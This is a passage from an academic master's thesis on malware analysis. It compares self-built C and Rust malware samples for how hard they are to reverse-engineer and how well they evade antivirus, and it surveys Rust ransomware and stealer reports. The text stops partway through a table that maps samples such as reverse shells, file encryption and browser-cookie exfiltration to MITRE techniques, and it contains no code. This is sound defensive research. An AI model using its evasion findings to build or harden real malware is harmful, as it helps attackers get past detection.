Download as pdf or txt
Download as pdf or txt
You are on page 1of 77

Rochester Institute of Technology

RIT Digital Institutional Repository

Theses

5-2023

A Comparative Analysis of Malware Written in the C and Rust


Programming Languages
Meghna Koorikkattil Praveen
mk7898@rit.edu

Follow this and additional works at: https://repository.rit.edu/theses

Recommended Citation
Praveen, Meghna Koorikkattil, "A Comparative Analysis of Malware Written in the C and Rust
Programming Languages" (2023). Thesis. Rochester Institute of Technology. Accessed from

This Thesis is brought to you for free and open access by the RIT Libraries. For more information, please contact
repository@rit.edu.
A Comparative Analysis of Malware Written in the C and
Rust Programming Languages

by

Meghna Koorikkattil Praveen

A thesis submitted in partial fulfillment of the requirements for


the degree of Master of Science in Computing Security

Supervised by

Dr. Wesam Almobaideen

Department of Electrical Engineering and Computing


Rochester Institute of Technology Dubai
United Arab Emirates

May, 2023
Rochester Institute of Technology Dubai
Department of Electrical Engineering and Computing
Master of Science in Computing Security

Thesis Approval Form

Student Name: Meghna Koorikkattil Praveen.


Thesis Title: A Comparative Analysis of Malware Written in the C and Rust Programming
Languages.

Committee Approval:

Committee Chair Dr. Wesam Almobaideen Date


Professor
Department of Electrical Engineering and Computing

Committee Member Dr. Kevser Ovaz Akpinar Date


Assistant Professor
Department of Electrical Engineering and Computing

Committee Member Dr. Omar Abdul Latif Date


Assistant Professor
Department of Electrical Engineering and Computing
Declaration
In accordance with the Rust Foundation’s draft of their new trademark policy (Apr. 2023), I
declare that the material in this thesis has not been endorsed, reviewed or approved by the
Rust Foundation. Additionally, I affirm that I have adhered to the trademark policy of all
registered trademarks mentioned in this thesis to the best of my ability. Any unauthorized use
of a trademark is unintentional and will be corrected.

Furthermore, I declare that this thesis is my own original work, with the exception of
references and acknowledgments that are clearly indicated. I have taken care to fully
acknowledge and cite all sources of information and ideas used in the development of this
work. This thesis has not been submitted for any other degree or examination at this or any
other institution.

i
Acknowledgments
I would like to dedicate this thesis to my late grandfather, who is the embodiment of hard
work and dedication. His unwavering commitment to educating his children and
grandchildren, despite his own lack of formal education, taught me the importance of
perseverance and the value of education. I would like to express my heartfelt gratitude to my
parents, for their constant encouragement and tireless efforts to provide me with the best
opportunities. I am eternally grateful for their sacrifices and commitment to my success.

I would like to thank my thesis advisor, Dr. Wesam Almobaideen, for his exceptional
guidance and support throughout the entire process. His insightful feedback and constructive
criticism challenged me to refine my research and improve the quality of this thesis. I would
also like to extend my sincere appreciation to Dr. Kevser Ovaz Akpinar and Dr. Omar Abdul
Latif, my thesis committee members for their time, effort, and expertise in reviewing my
work. Completing this thesis has been an incredible learning experience, and I am honored to
have had the opportunity to work and learn from such a knowledgeable group of
professionals.

ii
Abstract
The use of malware as a tool for cybercrime has become increasingly prevalent in recent
years, resulting in significant economic losses and security threats. Conventionally, malware
is written in C/C++. However, a recent trend has been observed where other languages are
being used to write malware. One such language is the Rust programming language. This
thesis aims to explore the aspects of the Rust programming language that contribute to its
preference for the development of malware, limitations in current analysis tools and
remediation for the same. A Systematic Literature Review (SLR) was conducted to identify
the trends of current research on malware written in the Rust programming language. For
experimentation, 40 malware samples belonging to 6 different categories of malware were
developed in the C and the Rust programming languages. These samples were compared for
their ease of analysis and effectiveness of antivirus evasion. It was observed that academic
and individual research in this area is sparse compared to industrial research. Results of the
experimentation show that current tools are comparatively less effective at analyzing and
reverse engineering malware written in the Rust programming language than those written in
C. Moreover, malware written in the Rust programming language evades antivirus detection
much better than their C counterparts. Based on the findings, a practical framework to
analyze malware written in the Rust programming language is proposed. The findings of this
thesis highlight the need for enhanced detection strategies for malware that are written in
unconventional programming languages. Overall, it contributes to the broader literature on
cybersecurity by offering new perspectives and recommendations for addressing this critical
challenge.

Keywords – anti-analysis, antivirus evasion, malware analysis, malware, reverse engineering,


rust programming language, systematic literature review.

iii
Table of Contents
Declaration……………………………………………………………………………………i

Acknowledgments……………………………………………………………………………ii

Abstract……………………………………………………………………………………...iii

1 Introduction...........................................................................................................................1

2 Background............................................................................................................................4
2.1 Malware......................................................................................................................................4
2.2 Malware Analysis.......................................................................................................................5
2.2.2 Static Analysis......................................................................................................................................5
2.2.3 Dynamic Analysis................................................................................................................................5
2.2.3 Code Analysis.......................................................................................................................................6
2.3 The Rustc Compiler....................................................................................................................6
2.4. The GCC and MSVC Compilers................................................................................................7

3 Systematic Literature Review..............................................................................................8


3.1 SLR Inclusion and Exclusion Criteria.........................................................................................8
3.2 Industrial and Independent Research..........................................................................................9
3.2.1 BuerLoader Variant..............................................................................................................................9
3.2.2 Hive Ransomware Variant....................................................................................................................9
3.2.3 BlackCat Ransomware.........................................................................................................................9
3.2.4 Luna Ransomware..............................................................................................................................10
3.2.5 Luca Stealer........................................................................................................................................10
3.2.6 Nokoyawa Variant..............................................................................................................................10
3.2.7 RansomExx Variant............................................................................................................................11
3.2.8 Agenda Ransomware Variant.............................................................................................................11
3.2.9 RustBucket.........................................................................................................................................11
3.2.10 Related Works in Go and Nim.........................................................................................................12
3.3 Academic Research...................................................................................................................13
3.4 SLR Observations.....................................................................................................................14
3.4.1 Gaps in Current Research...................................................................................................................15
3.4.3 Challenges in Current Research.........................................................................................................15

4 Methodology.........................................................................................................................16
4.1 Experimental Design.................................................................................................................16
4.1.1 Programs Developed for Static and Dynamic Analysis.....................................................................16
4.1.2 Program Developed for Code Analysis..............................................................................................21
4.2 Experiment 1: Comparing the Ease of Malware Analysis and Reverse Engineering................23
4.3 Experiment 2: Comparing the Effectiveness of Antivirus Evasion...........................................25

5 Results...................................................................................................................................26
5.1 Results of Experiment 1............................................................................................................26
5.1.1 Size of the Binaries............................................................................................................................26
5.1.2 Identifiable String Patterns in the Binaries........................................................................................27
5.1.3 False Positive and False Negative MITRE ATT&CK findings.........................................................28

iv
5.1.4 Reverse Engineering using Ghidra.....................................................................................................30
5.1.5 Reverse Engineering using IDAFree.................................................................................................34
5.1.6 Summary of Results of Experiment 1................................................................................................35
5.2 Results of Experiment 2............................................................................................................36
5.2.1 Summary of Results of Experiment 2................................................................................................38

6 Discussion.............................................................................................................................39
6.1 Larger Binary Size of the Malware Written in the Rust Programming Language.....................39
6.1.1 Standard and Runtime Libraries.........................................................................................................39
6.1.2 Default Dependency Linkage.............................................................................................................39
6.1.3 Inlining and Loop Unrolling for Optimization...................................................................................40
6.2. More Identifiable Strings in the Malware Written in the Rust Programming Language...........40
6.3 Limitations of Existing Reverse Engineering Tools..................................................................41
6.3.1 Name Mangling..................................................................................................................................41
6.3.2 Additional Code Added for Exception Handling...............................................................................41
6.4 Limitations of Existing Detection Systems...............................................................................42

7 Recommended Analysis Framework.................................................................................44


7.1 Phase 1: Static Analysis............................................................................................................45
7.2 Phase 2: Signature-based detection...........................................................................................45
7.3 Phase 3: Hybrid Dynamic Analysis Approach..........................................................................46
7.4 Phase 4: Code Analysis.............................................................................................................47
7.4.1 Technique to Find the Main Function................................................................................................47
7.4.2 GhidRust............................................................................................................................................48
7.4.3 GhidraRustDependenciesExtractor....................................................................................................48
7.4.4 DemangleRust.py...............................................................................................................................48
7.5 Limitations and Future Work....................................................................................................48

8 Conclusion............................................................................................................................50

References...............................................................................................................................51

Appendix A..............................................................................................................................57

Appendix B..............................................................................................................................59

v
List of Figures
Figure 1. Timeline of attacks by malware written in the Rust programming language............2
Figure 2. Categories of malware developed and tested...........................................................17
Figure 3. Control flow of the code analyzed program.............................................................22
Figure 4. Exposed home directory in the embedded strings of the malware written in the Rust
programming language.............................................................................................................28
Figure 5. Symbol tree of the program written in the C programming language in Ghidra.....30
Figure 6. Decompiled “main” function of the program written in the C programming
language in Ghidra...................................................................................................................31
Figure 7. Decompiled "is_valid" function of the program written in the C programming
language in Ghidra...................................................................................................................31
Figure 8. Searching for the "Access Denied" text in the program written in the Rust
programming language in Ghidra.............................................................................................32
Figure 9. Decompiled "main" function of the program written in the Rust programming
language in Ghidra...................................................................................................................32
Figure 10. Additional code observed in the program written in the Rust programming
language in Ghidra...................................................................................................................33
Figure 11. Combined code found in the decompiled program written in the Rust
programming language in Ghidra.............................................................................................33
Figure 12. Disassembled flow of the "main" function of the program written in the C
programming language in IDA Free.........................................................................................34
Figure 13. Disassembled flow of the "is_valid" function of the program written in the C
programming language in IDA Free.........................................................................................34
Figure 14. Disassembled flow of the program written in the Rust programming language in
IDA Free...................................................................................................................................35
Figure 15. The recommended malware analysis framework...................................................44

vi
List of Tables
Table 1. Overview of industrial and independent research......................................................12
Table 2. Overview of academic research.................................................................................13
Table 3. List of software used for the experiments..................................................................16
Table 4. Mapping of the MITRE ATT&CK Techniques Mapped to the Sub-categories of
malware....................................................................................................................................17
Table 5. The cause-effect design of Experiment 1...................................................................24
Table 6. The cause-effect design of Experiment 2...................................................................25
Table 7. Comparison of the size of malware binaries..............................................................26
Table 8. List of identifiable strings in the binary.....................................................................27
Table 9. Calculation of FP% and FN% MITRE ATT&CK findings for malware in the C
programming language.............................................................................................................28
Table 10. Calculation of FP% and FN% MITRE ATT&CK findings for malware in the Rust
programming language.............................................................................................................29
Table 11. Results of comparison of the FP% and FN% of malware written in the C and Rust
programming languages...........................................................................................................30
Table 12. Calculation of the evasion% of malware written in the C programming language. 36
Table 13. Calculation of the evasion% of malware written in the Rust programming
language....................................................................................................................................37
Table 14. Results of comparison of the evasion% of malware written in the C and Rust
programming languages...........................................................................................................38

vii
1 Introduction
Malware, short for “Malicious Software” is a computer program written to perform harmful
actions such as destroy, disable, or steal computer assets [1]. A polyglot malware is one that
exists in different file formats or has variants in multiple programming languages [2].
According to Statistica, 5.4 billion malware attacks were detected in 2021 [3]. An emerging
trend observed in 2021 is a shift toward unconventional programming languages (also known
as exotic languages) such as Rust, Go, and Nim for writing malware [4]. Industrial reports
state that this shift is motivated by a desire to make malware reverse engineering difficult and
to evade signature-based detection mechanisms [5], [6]. However, there is a lack of research
with empirical evidence supporting this statement. This thesis investigates the motivation for
the paradigm shift from conventional C/C++ to the aforementioned unconventional
programming languages, specifically the Rust programming language.

The Rust programming language is a new, open-source programming language whose first
stable version was released on May 15, 2015 [7]. It started as a project within Mozilla
Research to develop a multi-paradigm programming language that provided excellent
memory safety, speed, and concurrency [8], [9]. Moreover, it uses the Low Level Virtual
Machine (LLVM) compiler technology for improved performance [10]. Due to these features,
it quickly rose to popularity, and software developers began to rewrite several C/C++
software in the Rust programming language [11]. Mozilla rewrote approximately 160000
lines of C++ code of the Firefox browser in the Rust programming language [8]. Another
notable adoption of the Rust programming language is within the Linux kernel and Linux
drivers [12], [13], [14].

The Rust programming language has also gained immense popularity among many malware
developers since 2021 [15], [16]. Notorious Ransomware as a Service (RaaS) groups have
begun to distribute polyglot malware by migrating their works to Rust. A timeline of attacks
carried out by malware written in the Rust programming language is illustrated in Figure 1.

1
Figure 1. Timeline of attacks by malware written in the Rust programming language.

In order to improve the current defense mechanisms and strategies, it is imperative to


understand the characteristics of the Rust programming languages that could be advantageous
to an attacker. However, through a Systematic Literature Review (SLR), it was found that
despite its popularity, the Rust programming language is the least researched in academia,
particularly within the area of malware development. Hence, this thesis is motivated by the
lack of research on malware written in the Rust programming language despite its rise in
popularity as a programming language of choice among malware authors.

The objective of this thesis is to answer the following research questions:


RQ1: What features of the Rust programming language have led to its growing prevalence
among malware authors?
RQ2: What are the constraints of the currently available malware analysis and detection
tools in terms of examining malware written in the Rust programming language?
RQ3: What techniques can be used to better analyze malware written in the Rust
programming language?

This thesis compares malware written in C and the Rust programming language for ease of
analysis as a defender, and ease of antivirus evasion as an attacker. The differences in
analyzing and reverse engineering malware written in C and the Rust programming languages
are identified. Furthermore, this thesis conducts a comparative study on the antivirus evasion
rates of malware written in the C and Rust programming language, by running them through
70 different antivirus providers. The following hypotheses are tested:

H1: The intricacies of the RustC compiler complicate the analysis of the malware written in
the Rust programming language compared to that written in C.
H2: Malware written in the Rust programming language evades antivirus detection better
than that written in C.

2
In addition to the results of the comparative analysis, the contribution of this thesis is a
practical malware analysis framework proposed specifically to analyze malware written in
the Rust programming language. This framework can be used by malware analysts to analyze
a new malware or a malware variant written in the Rust programming language.

The rest of this thesis is structured as follows: Chapter 2 provides a background on malware,
malware analysis and the Rustc, GNU C Compiler (GCC) and Microsoft Visual C++
(MSVC) compilers for a new reader. Chapter 3 discusses the various industrial, individual
and academic research that were reviewed. Chapter 4 explains the research methodology.
Chapter 5 presents the results of the experiments conducted for this thesis. Chapter 6
discusses the implications of these results based on which a practical framework for
analyzing malware written in the Rust programming language is proposed in Chapter 7.
Finally, Chapter 8 concludes this thesis.

3
2 Background
This chapter provides a background on the core concepts discussed in this thesis such as the
history of malware, the types of malware, the malware analysis process and the compilers
used by the C and the Rust programming languages.

2.1 Malware
In 1966, Neumann [17], [18] published the “Theory of Self-Reproducing Automata” in which
he speculated that a computer code could have the ability to copy itself to other systems like a
biological virus. The history of malware dates back to the early days of computer technology,
with some of the earliest recorded instances like the Creeper program appearing in 1971 [19].
Over time, malware has evolved and become more sophisticated with the development of
new techniques for spreading and evading detection [20], [21], [22], [23]

The following are the common types of malware [1], [24]:

1. Viruses: They are self-replicating malware that spread through infected files in email
attachments or removable media like USB drives.

2. Worms: They are also self-replicating malware. However, they do not require a file to
spread and can spread across networks. Some worms are designed to create backdoors
in a system to allow attackers to gain unauthorized access.

3. Trojans: They are malware that are disguised as legitimate software. Similar to
worms, trojans often open a backdoor for attackers. They are also used to steal
sensitive information. However, trojans cannot self-replicate or spread like worms and
viruses.

4. Ransomware: They are malware that encrypt a victim's files and demand a ransom in
exchange for the decryption. Certain variants of ransomware also threaten to leak
sensitive information if the ransom is not paid.

4
5. Information Stealer: They are malware that are designed to monitor and steal a
user's information such as their keystrokes, browsing history, usernames, and
passwords.

6. Adware: They are malware that display unwanted advertisements on a user's


computer. They act as a nuisance, slow down the system, and may lure the victim into
downloading more dangerous malware.

2.2 Malware Analysis


Malware analysis is the process of examining malicious software to identify its purpose,
understand its behavior, and develop defense mechanisms to detect and remove it [25], [26],
[27]. Malware analysis can be done in three stages: static analysis, dynamic analysis, and
code analysis [28], [29].

2.2.2 Static Analysis

Static analysis involves gathering information about the malware without executing its binary
[30]. Static analysis involves analyzing information such as the file type, file hash, and
embedded strings to draw inferences regarding the source language, the intent and potential
behavior of the malware [31], [32].

While static analysis is a good start for the analysis process it is not sufficient because
oftentimes, malware have malicious runtime behavior [33]. For this reason, static analysis
should be followed up with dynamic analysis.

2.2.3 Dynamic Analysis

Dynamic analysis involves gathering information about the runtime behavior of the malware
by executing it in an isolated environment like a sandbox or a virtual machine (VM) [1], [24],
[34], [35]. This includes monitoring the network traffic generated by the malware and its
interaction with the target’s file system. This step is crucial to identify command and control
(C&C or C2) servers, lateral movement techniques, files dropped or files exfiltrated by the
malware. Dynamic analysis is particularly useful for detecting previously unknown malware
that tend to go undetected by signature-based antivirus software.

5
Sophisticated malware may contain code that allows them to detect if they are running in a
sandbox or a VM [36], [33]. Such malware remain dormant in these isolated environments
thus making dynamic analysis less effective. For this reason, code analysis is required.

2.2.3 Code Analysis

Code analysis is often referred to as code reversing or reverse engineering [37], [38]. Code
analysis involves examining the disassembled or decompiled code of the malware to identify
hidden functionalities, attack flow, and other malicious behavior.

Disassembly is the process of converting the binary code of the malware into assembly code.
This can be done using tools such as IDA [39], [40] or OllyDbg [41]. Decompilation is the
process of converting the binary or assembly code into a higher-level language such as C,
C++ or Rust. This can be done using tools like Ghidra [42].

2.3 The Rustc Compiler


Rustc is the compiler for the Rust programming language [43]. It translates code written in
the Rust programming language into machine code that can be executed on a specific target
platform. At its core, rustc uses the Low Level Virtual Machine (LLVM) compiler technology
[44], [45]. LLVM provides a powerful set of tools for code optimization, which allows rustc
to produce code that is both fast and reliable. Additionally, rustc has built-in optimizations to
further improve code performance.

The key highlight of the rustc compiler when it comes to developing large projects is its
feature of incremental compilation. Incremental compilation significantly reduces the
compile time of a rust project by reusing previously compiled parts of the project [46]. This is
done by keeping a record of the dependencies used in each part of the code and selectively
recompiling only the parts that have been changed. Another useful aspect of rustc is its
support for cross-compilation. Rustc makes cross-compilation easy by providing a number of
pre-built cross-compilation toolchains as well as support for custom toolchains. Cross-
compilation allows developers to compile code for a different target platform than the one
they are currently using [47].

6
2.4. The GCC and MSVC Compilers
GCC MinGW [48] is a port of the GNU Compiler Collection (GCC) [49], [50] that provides a
Unix-like environment on Windows for developers to build native Windows applications
using C, C++, and Fortran programming languages. The GCC MinGW project is open-source
and is actively maintained by a community of developers, making it a reliable and flexible
tool for Windows software development.

The Microsoft Visual C++ (MSVC) [51] compiler is a commercial compiler that is part of the
Microsoft Visual Studio Integrated Development Environment (IDE) [52], which supports C
and C++. It is used for developing applications for the Windows operating system and is
optimized for performance and compatibility with Microsoft's libraries and tools.

One of the main differences between GCC and MSVC is their target platforms. GCC is a
cross-platform compiler that can be used to build applications for a wide range of platforms,
including Linux, MacOS, and Windows [50]. MSVC, on the other hand, is a compiler that is
specifically designed for building applications for the Windows operating system [51]. As a
result, MSVC provides deeper integration with the Windows operating system and
Microsoft's libraries and tools.

7
3 Systematic Literature Review
A Systematic Literature Review (SLR) is a rigorous literature review methodology that
involves the collection and study of defined categories of literature to gather evidence in a
manner that can be easily reproduced by future researchers [53].

In this thesis, an SLR was performed to understand the current state of research on malware
written in the Rust programming language. Due to the nature of this topic, the search for
literature was not limited to academic sources i.e., independent and industrial research were
included. The observations drawn from the SLR are detailed in Section 3.4.

3.1 SLR Inclusion and Exclusion Criteria


The inclusion and exclusion criteria for selecting literature for the SLR are as follows:

Inclusion Criteria:

1. Independent research presented in reputed cybersecurity conferences like BlackHat,


DEFCON and BSides.

2. Industrial research published as white papers by reputed companies like Kaspersky,


Microsoft, Blackberry, McAfee, IBM, etc.

3. Academic research published in journals or conferences.

4. Books and Theses.

Exclusion Criteria:

1. Independent blogs and videos.

2. Sources that are not in English.

8
3.2 Industrial and Independent Research
The works of industrial pioneers in analyzing malware written in the Rust programming
language such as Kaspersky, Microsoft and BlackBerry are discussed in detail in Sections
3.2.1-3.2.9. Section 3.2.10 discusses similar works conducted by individual researchers in
other programming languages such as Go and Nim.

3.2.1 BuerLoader Variant

Proofpoint Threat Research Team [15] identified a variant of the BuerLoader written in the
Rust programming language in May 2021. They named it RustyBuer. Buer Loader is a type
of malware that is used to deliver other malware payloads onto a victim's computer.
Proofpoint’s analysis of RustBuer shows that the source language of the binary was detected
by the cargo and “.rs” dependencies [15]. However, the technique used to analyze the
malware or list these dependencies were not documented. The report concludes by stating
that the use of the Rust programming language in malware development is likely to increase.

3.2.2 Hive Ransomware Variant

Microsoft [16] has provided a detailed report of the upgraded Hive ransomware which was
rewritten from Go to the Rust programming language. Hive was first observed in June 2021
and grew into popularity within the Ransomware as a Service (RaaS) ecosystem. The report
states that the upgraded variant in the Rust programming language provides better
performance and improved anti-analysis techniques. It also performs an Exclusive OR (XOR)
operation on the strings with constants to evade detection. This report does not explicitly
mention the tools used to analyze the binary. However, from the images in it [16], one can
infer that OllyDbg [41] or Immunity Debugger [54] were used to analyze the binary.

3.2.3 BlackCat Ransomware

BlackCat was first observed in December 2021 when it was advertised by a RaaS group
called ALPHV. It is the most widely discussed and analyzed malware written in the Rust
programming language, most notably by researchers at Palo Alto Unit 42 [55], Microsoft [56]
and Kaspersky [57], [58]. BlackCat samples targeting Windows and Linux operating systems
have been identified due to the cross-compilation capability of the Rust programming
language. BlackCat has anti-analysis features that detect whether it is being deployed in a

9
virtual environment before executing its payload. It also has the ability to terminate security
software like antivirus and backup tools.

Similar to Proofpoint’s analysis of the RustyBuer [15], Kaspersky’s malware analysis report
also demonstrates the detection of the source language by identifying the cargo and “.rs”
dependencies. Snippets of the disassembled and decompiled binary are shown in the report,
however, the tools and techniques used to reverse engineer this malware are not discussed.

3.2.4 Luna Ransomware

Researchers at Kaspersky [59] discovered the Luna ransomware which is written in the Rust
programming language, in June 2022. This malware targets Windows, Linux and ESXi
systems. Rivero et al. identified that it uses an uncommon combination of X25519 and AES
(Advanced Encryption Standard) for encryption [60]. Their analysis report states that
ransomware gangs are moving towards the Go and Rust programming languages as their
source code are easy to port due to their platform agnostic nature, unlike C/C++ which use
different APIs and compilers for different platforms.

3.2.5 Luca Stealer

Blackberry [61] analyzed Luca Stealer, a malware written in the Rust programming language,
which was used to steal 7 million dollars worth of sol coins from the Solana blockchain on
August 3, 2022. It has seen several variants after its source code was made available in one of
the underground hacking forums. Blackberry’s research team discovered that the variants of
Luca stealer collect sensitive data such as system information, browser data, and discord
tokens in “.txt” or “.zip” files and exfiltrate them as a chat message on Telegram or Discord.
Although it was observed that the malware only targets the Windows operating systems, they
predict that variants targeting Linux, MacOS and Android exist due to the cross-compilation
ability of the Rust programming language.

3.2.6 Nokoyawa Variant

In September 2022, a variant of Nokoyawa ransomware which was rewritten from the C to
the Rust programming language was identified [62]. Researchers at ZScaler [63] published
their technical analysis of this variant. It was found that this variant uses the x25519_dalek

10
library for the Rust programming language for encryption. They predict that the rewrite was
motivated by the increase in the speed of encryption provided by the cryptographic libraries
of the Rust programming language.

3.2.7 RansomExx Variant

In November 2022, IBM Security X-Force [64] reported a variant of the RansomExx
ransomware that is rewritten from C++ to the Rust programming language. When run through
VirusTotal at the time, it was only detected by 14 antivirus vendors. The researchers at IBM
Security X-Force detected the source language of the binary from the strings within the
binary. They state that the binary is comparatively difficult and very time-consuming to
analyze and reverse engineer. They conclude by saying that it is highly likely that more
ransomware operators will adopt the Rust programming language as an innovative technique
to build stable and evasive malware.

3.2.8 Agenda Ransomware Variant

In December 2022, Trend Micro [65] published their analysis of a variant of Agenda (also
known as Qilin) ransomware rewritten from Go to the Rust programming language. The
Agenda ransomware is notorious for targeting healthcare and education organizations of
Thailand and Indonesia. From the analysis, the researchers at Trend Micro discovered that the
new variant written in the Rust programming language had features for faster encryption and
better antivirus evasion. Unlike previously mentioned reports, Trend Micro’s report mentions
the tools used during the analysis. BinTexT [66] was used to view the dependency strings to
identify the source language and Hiew [67] was used to view the changes made to a file when
analyzing the fast encryption feature of the new variant.

3.2.9 RustBucket

From this survey, RustBucket is the only malware written in the Rust programming language
that was found to be targeting the MacOS operating system. RustBucket was detected by
Jamf Threat Labs in April 2023 [68]. It has a complex multi-stage execution process.
According to Jamf, it was undetected by all the antivirus vendors in VirusTotal at the time of
analysis.

11
3.2.10 Related Works in Go and Nim

Some individual researchers have also presented their research at conferences like DEFCON
and BSides. Individual researchers worth mentioning are Kiely [69], [70] for his work on
analyzing malware written in the Nim programming language, Kurtz [71], McMurray and
Seese [72] for their work on analyzing malware written in the Go programming language.
The individual researchers have briefly mentioned the technicalities that make reverse
engineering of these binaries difficult and antivirus evasion easier. However, these works
concern only malware written in the Nim or Go programming languages. There is a lack of
similar research for malware written in the Rust programming language.

Table 1. summarizes the industrial and independent research discussed in this section. For
each research work, its category (industrial or independent) and the source language of the
malware are listed. It also shows whether the research explains the tools and techniques used
to analyze the malware, and whether it discusses language-specific technicalities considered
during analysis.

Table 1. Overview of industrial and independent research.


Malware’s Researcher’s Research Source Language Explains
Name Name Category Original Rewritten Tools & Language-
Techniques specific
technicalities
BuerLoader Proofpoint [15] Industrial C Rust x x
Hive Microsoft [16] Industrial Go Rust x x
BlackCat Kaspersky [58], Industrial Rust N/A
Microsoft [56], x x
Palo Alto [55]
Luna Kaspersky [60] Industrial Rust N/A x x
LucaStealer BlackBerry [61] Industrial Rust N/A x x
Nokoyawa ZScaler [63], Industrial C Rust
x x
TrendMicro [62]
RansomExx IBM X-Force [64] Industrial C++ Rust x x
Agenda Trend Micro [65] Industrial Go Rust x x
RustBucket Jamf [68] Industrial Rust N/A x x
Custom Matt Kiely [70], [69] Independent Nim N/A ✔ ✔
Custom Ben Kurtz [71] Independent Go N/A ✔ ✔
Custom McMurray and Seese Independent Go N/A
[72]
✔ ✔

12
3.3 Academic Research
Academic sources were reviewed from four digital databases: ACM Digital Library,
IEEEXplore, ScienceDirect and SpringerLink. Over 300 sources were reviewed. The search
term used was: (Rust OR “Rust programming language”) AND (malware OR “reverse
engineer”).

Table 2. lists the results of this search as of April 26, 2023. In each digital database, the
search term (Rust OR “Rust programming language”) AND (malware OR “reverse
engineer”) was used. Additional search filters of “Article” and “Conference Paper” were
applied only for the Springer Link database. The third column shows the total number of
works returned by each digital database. Of these results, works relevant to analyzing or
reverse engineering malware written in the Rust programming language are noted in the last
column.

Table 2. Overview of academic research.


Database Name Additional Search Filters Total Number of Works Number of Relevant
Applied Works
ACM Digital Library None 120 0
IEEE Xplore None 10 0
Science Direct None 64 0
Springer Link Article 58 0
Conference Paper 54 0

It was found that there were no relevant academic works that studied malware written in the
Rust programming language. However, there were a few works whose insights and
methodology were used or modified to design the experiments for this thesis. These works
are discussed below.

Adhikari et al. [73] developed a system to detect the source language of a binary using the
Linux strings tool. When a binary is passed to the Linux strings tool, it outputs all printable
sequence characters in the binary. The authors used this to identify the language of a binary.
They trained a Random Forest model on the output of the Linux strings tool applied to C,
C++, Rust, Go, Fortran, and Swift binaries. However, Adhikari et al. did not mention the
specific strings or string-patterns that were used to identify a language of the compiled binary.
Akabane et al. [74] studied different toolchains used to build IoT malware by identifying the

13
names of different library functions listed in the decompiled code. Akabane lists studying
malware written in the Rust and Go programming languages as future work. Using the
insights from Akabane’s and Adhikari’s works, this thesis produces a list of strings that can be
used by malware analysts to identify if the source language of the compiled binary was C or
the Rust programming language.

As mentioned earlier, RustC uses LLVM for optimization. There were two interesting works
related to LLVM. Küchler et al. [75] developed a tool that generates a code property graph
using the intermediate code of LLVM compilers (LLVM-IR). The authors developed this tool
to allow application security analysts to analyze binary dependencies of software. Tamboli et
al. [76] studied the techniques used by metamorphic malware to evade signature-based
detection. They developed a metamorphic code generator using the LLVM framework. This
code generator manipulates the LLVM-IR through dead code injection, register swapping,
substitution, and transposition. The possibility of such modifications to the LLVM compiler
technology is advantageous to malware developers that use Rust.

Dube et al. [77] studied various malware obfuscation techniques that make reverse
engineering difficult. Although the goal of this research was to apply the same techniques as
that of malware to protect software intellectual property, this work gives useful insights into
obfuscation techniques. The authors identified that upon obfuscation, the binaries are difficult
to analyze using popular tools like IDA (Interactive Disassembler). WebAssembly, also
known as wasm is a low-level compiler target for high-level languages like C/C++, Rust, or
Go. The purpose of wasm is to allow writing browser executable programs in a high-level
language of their choice. Bhansali et al. [78] discussed different techniques to obfuscate
wasm code. They found that since wasm is low-level, obfuscation had to be done using the
high-level code. These insights were used during the experimental design phase of this thesis
to test the ease of reverse engineering binaries written in C and the Rust programming using
popular disassemblers and decompilers.

3.4 SLR Observations


In this section, a comprehensive overview of the research landscape is provided by outlining
the research gaps and challenges observed after conducting the SLR.

14
3.4.1 Gaps in Current Research

The following three gaps were identified through the SLR:

1. Academic research on malware in the Rust programming language is sparse in


comparison to industrial and independent research publications.

2. Among independent researchers, the number of works on malware written in the


Rust programming language is lower than those on other unconventional
programming languages like Go and Nim.

3. The industrial research works only share the results of their malware analysis and do
not provide information regarding the process of analyzing malware written in the
Rust programming language.

This thesis aims to serve as a foundational starting point for the exploration of these above-
mentioned areas that have not been adequately addressed in the existing literature to stimulate
further research efforts in these areas.

3.4.3 Challenges in Current Research

Upon exploring multiple malware repositories such as The Zoo [79] and VXUnderground
[80], it was found that source code for malware variants written in the Rust programming
language are not available. Hence, sourcing real-world malware written in these languages
for academic or individual research is a challenge that is probably hindering the research
output in these areas.

It was observed that most industrial researchers had access to the malware binary or source
code through the deployment of their Endpoint Detection and Response (EDR) and antivirus
(AV) tools. However, most of the individual researchers had to resort to writing simple
malware samples by themselves.

This thesis expands on the approach used by individual researchers by developing program
samples that simulate the behavior of different categories of malware. The experimental
design of this thesis is explained in further detail in the next chapter.

15
4 Methodology
This chapter provides a detailed description of the methodology used to conduct experiments,
collect and analyze data for this thesis. It explains the research design, the research questions
that will be answered, the hypotheses formulated, the experimental setup and the metrics used
to compare malware written in the C and the Rust programming languages.

4.1 Experimental Design


A cause-effect experimental design is a form of quantitative research that involves
manipulating independent variables (cause) and measuring its effect on dependent variables
(effect) in a controlled environment. The hypotheses are tested to answer the research
questions listed in Chapter 1 using two experiments. Table 3. lists the software and their
versions used to conduct the experiments.

Table 3. List of software used for the experiments.

Software Version
Oracle VM Virtual Box 7.0.6
Windows Operating System Windows 10 Enterprise Edition
Ghidra 10.1.3
IDA Free 8.2
MinGW 10.0.0
MSVC 143
Windows 10 SDK 10.0.22000.0
Rust 1.68.2
GNU Strings 2.3
VirusTotal (free) Web Interface API v3

4.1.1 Programs Developed for Static and Dynamic Analysis

To compare the ease of static and dynamic analysis, 40 malware samples were developed in
the C and Rust programming languages for the Windows operating system. The signatures for
these sub-categories of malware are provided in Appendix A, and their pseudocode are
provided in Appendix B. Figure 2. shows the 6 categories and 20 sub-categories of malware
developed based on different behaviors.

16
Figure 2. Categories of malware developed and tested.

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a publicly


accessible knowledge base describing different cyberattacks [81]. The behaviors of these
malware have been mapped to MITRE ATT&CK Techniques in Table 4.

Table 4. Mapping of the MITRE ATT&CK Techniques Mapped to the Sub-categories of malware.

Sub-category of malware MITRE ATT&CK Techniques


Delete files T1485 Data Destruction
T1070 Indicator Removal.
Encrypt files T1486 Data Encrypted for Impact.
Create files T1565 Data Manipulation.
Modify file T1565.001 Data Manipulation: Stored Data Manipulation.
Simple reverse shell T1059 Command and Scripting Interpreter.
Simple bind shell T1059 Command and Scripting Interpreter.
Obfuscated reverse shell T1059 Command and Scripting Interpreter.
T1027 Obfuscated Files or Information.
Obfuscated bind shell T1059 Command and Scripting Interpreter.
T1027 Obfuscated Files or Information.
Hosts file exfiltration using email T1114 Email Collection.
T1020 Automated Exfiltration.
Edge browser history exfiltration using email T1114 Email Collection.
T1020 Automated Exfiltration.
Edge browser cookies exfiltration using T1114 Email Collection.
email T1020 Automated Exfiltration.
